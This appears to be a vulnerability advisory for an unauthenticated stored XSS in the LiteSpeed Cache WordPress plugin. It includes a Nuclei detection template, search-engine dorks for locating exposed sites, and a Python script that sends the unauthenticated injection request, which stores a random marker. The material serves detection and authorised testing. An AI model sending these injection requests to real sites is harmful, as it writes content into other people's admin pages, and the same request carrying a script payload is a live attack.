CVE-2023-40000: LiteSpeed Cache <= 5.7 - Unauthenticated Stored XSS

Date: 2025-08-01 | Affected software: LiteSpeed Cache | PoC: public

Vulnerability description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows stored XSS. This issue affects LiteSpeed Cache from n/a through 5.7.

As the template below shows, the injection request is an unauthenticated POST to the plugin's REST route /wp-json/litespeed/v1/cdn_status: the value sent in result[_msg] is stored as an admin message and rendered in wp-admin (the template checks the LiteSpeed Cache CDN page, admin.php?page=litespeed-cdn, after logging in), so an administrator who opens that page executes the payload. The template reports a match either passively, from the Stable tag in the publicly readable readme.txt, or actively, by storing a random marker, logging in with the supplied username and password variables and confirming the marker is echoed back. The active path writes into the target's admin notices (the template is tagged intrusive) and needs administrator credentials; the passive path is a version match only.

PoC code [public]

id: CVE-2023-40000

info:
  name: LiteSpeed Cache <= 5.7 - Unauthenticated Stored XSS
  author: 0x_Akoko
  severity: high
  description: |
    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows stored XSS. This issue affects LiteSpeed Cache from n/a through 5.7.
    The active verification path (requests 2-4) needs administrator credentials passed as the username and password variables and stores a marker in the target's admin notices.
  reference:
    - https://wpscan.com/vulnerability/dd9054cc-1259-427d-a4ad-1875b7b2b3b4
    - https://wordpress.org/plugins/litespeed-cache
    - https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-5-7-unauthenticated-site-wide-stored-xss-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2023-40000
    cwe-id: CWE-79
    epss-score: 0.82698
    epss-percentile: 0.99196
    cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: litespeedtech
    product: litespeed_cache
    framework: wordpress
    shodan-query: 'vuln:CVE-2023-40000'
    fofa-query: "wp-content/plugins/litespeed-cache/"
    google-query: inurl:"/wp-content/plugins/litespeed-cache/"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss,intrusive

variables:
  marker: "{{randstr}}"

# either the passive version match, or the full chain: inject marker, log in as admin, confirm it renders
flow: http(1) || (http(2) && http(3) && http(4))

http:
  # step 1: passive fingerprint from the plugin's public readme.txt
  - raw:
      - |
        GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'LiteSpeed Cache')
          - compare_versions(version, '<= 5.7')  # affected range per the advisory: through 5.7
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'

  # step 2: unauthenticated POST; on a vulnerable site the marker is stored in the plugin's admin notices
  - raw:
      - |
        POST /wp-json/litespeed/v1/cdn_status HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        success=0&result[_msg]={{marker}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body,'_res','ok')
          - contains(content_type,"application/json")
          - status_code == 200
        condition: and
        internal: true

  # step 3: administrator login; pass -var username=... -var password=... on the nuclei command line
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  # step 4: the stored marker is rendered on the CDN settings page of the authenticated administrator
  - raw:
      - |
        GET /wp-admin/admin.php?page=litespeed-cdn HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "{{marker}}", "LiteSpeed Cache")
        condition: and
# digest: 4a0a00473045022100d49871db784d1ba3219937be3ed14e5a40392d68c3df290fdc281f1a3d068fa902204e4167b1dc38a8c457dc363315f2cfae2884bae5481b2ed075bd3e4b019a5fdf:922c64590222798bb761d5b6d8e72950
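The same checks as a stand-alone script, added here as an example; it is neither the page's Nuclei template nor LiteSpeed code. It uses only the Python standard library. The readme path and regex, the REST route, the POST body and the expected `_res: ok` JSON are taken from the template above; the function names, the `lsc` marker prefix, the `LAST_AFFECTED` constant and the default target URL are this example's own. The response check is stricter than the template's substring match (it parses the JSON and requires `_res == "ok"`), and the version comparison treats 5.7.0 as equal to 5.7 while keeping 5.7.0.1 above the affected range. The pure functions run offline; `main()` performs steps 1 and 2 against a live target given on the command line and leaves the authenticated steps 3 and 4 to the template.

```python
#!/usr/bin/env python3
"""Re-implementation of the checks in the Nuclei template above.

Added example, not the page's template or LiteSpeed's code. Standard library only.
The endpoint path, readme regex, POST body and expected JSON come from the template;
the function names, marker prefix and default target are this example's assumptions.
"""
import json
import re
import secrets
import sys
import urllib.error
import urllib.parse
import urllib.request

LAST_AFFECTED = "5.7"  # advisory: affected "from n/a through 5.7"
STABLE_TAG = re.compile(r"Stable tag:\s*([0-9.]+)")


def parse_version(s):
    """'5.7' -> (5, 7); '5.7.0.1' -> (5, 7, 0, 1). Trailing zeros are dropped
    so that 5.7.0 compares equal to 5.7, while 5.7.0.1 stays above it."""
    parts = [int(p) for p in s.split(".") if p.isdigit()]
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def is_affected(version, last_affected=LAST_AFFECTED):
    return parse_version(version) <= parse_version(last_affected)


def fingerprint(readme_text):
    """Template step 1: plugin readme present and Stable tag within range.
    Returns None when the plugin is not identified."""
    if "LiteSpeed Cache" not in readme_text:
        return None
    m = STABLE_TAG.search(readme_text)
    if not m:
        return None
    return {"version": m.group(1), "affected": is_affected(m.group(1))}


def make_marker():
    """Random alphanumeric marker, the role {{randstr}} plays in the template."""
    return "lsc" + secrets.token_hex(6)


def build_probe(marker):
    """Body of the unauthenticated POST to /wp-json/litespeed/v1/cdn_status."""
    return urllib.parse.urlencode({"success": "0", "result[_msg]": marker})


def probe_accepted(status, content_type, body):
    """Template step 2 matcher, made strict: 200, JSON content type, and a JSON
    object whose _res is "ok" (the template only looks for the two substrings)."""
    if status != 200 or "application/json" not in (content_type or ""):
        return False
    try:
        data = json.loads(body)
    except ValueError:
        return False
    return isinstance(data, dict) and data.get("_res") == "ok"


def marker_rendered(admin_html, marker):
    """Template step 4: the marker appears on the authenticated CDN settings page."""
    return "LiteSpeed Cache" in admin_html and marker in admin_html


def fetch(req):
    """Return (status, content_type, body) even for 4xx/5xx responses."""
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status, r.headers.get("Content-Type", ""), r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Content-Type", ""), e.read().decode("utf-8", "replace")


def main(base):
    """Steps 1 and 2 against a live target. Step 2 writes the marker into the
    site's admin notices (the template is tagged intrusive), so only run it
    against a site you are authorised to test. Steps 3 and 4 need an
    administrator session and are left to the template."""
    base = base.rstrip("/")
    _, _, readme = fetch(base + "/wp-content/plugins/litespeed-cache/readme.txt")
    print("fingerprint:", fingerprint(readme))
    marker = make_marker()
    req = urllib.request.Request(
        base + "/wp-json/litespeed/v1/cdn_status",
        data=build_probe(marker).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    print("probe accepted:", probe_accepted(*fetch(req)), "marker:", marker)


if __name__ == "__main__":
    # placeholder default target; pass the real base URL as the first argument
    main(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1")
```

Run it as `python3 check.py https://target.example` (hypothetical host). A site that answers step 1 with a Stable tag of 5.7.0.1 or later is reported as not affected even though the plugin is present, which is the case the template's passive path exists to separate from a live injection.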
